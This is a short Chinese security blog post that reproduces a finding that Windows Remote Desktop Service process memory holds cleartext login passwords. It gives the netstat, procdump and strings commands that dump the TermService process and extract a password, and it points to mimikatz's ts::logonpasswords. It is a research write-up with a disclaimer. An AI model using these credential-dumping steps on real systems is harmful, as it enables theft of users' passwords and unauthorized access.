推特上看到一篇推文 https://twitter.com/jonasLyk/status/1393058962942083076 他发现了在远程桌面服务的内存中存储了用户明文密码,本文复现下。
转储明文
我有一台08的server,账号密码为administrator admin08!@#
。使用3389登录
运行如下命令转储远程桌面服务的进程内存
netstat -nob | Select-String TermService -Context 1
.procdump.exe -accepteula -ma 2812 rdp.dmp
然后用strings过滤字符串发现确实抓到了明文
strings -el rdp.dmp |grep admin08 -C3
mimikatz发布了一个Pre-release版本[1],提供了ts::logonpasswords
一键抓取,不过在2008上不起作用,等待本杰明继续更新。
思考
其他进程中是否还有明文保存?转储远程桌面服务进程的内存是不是不会被杀软拦截了?Windows是不是不安全了?
References
[1]
Pre-release版本: https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210518
分享、点赞、在看就是对我们的一种支持!
本文始发于微信公众号(ChaBug):从svchost.exe转储RDP在线用户的明文密码
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论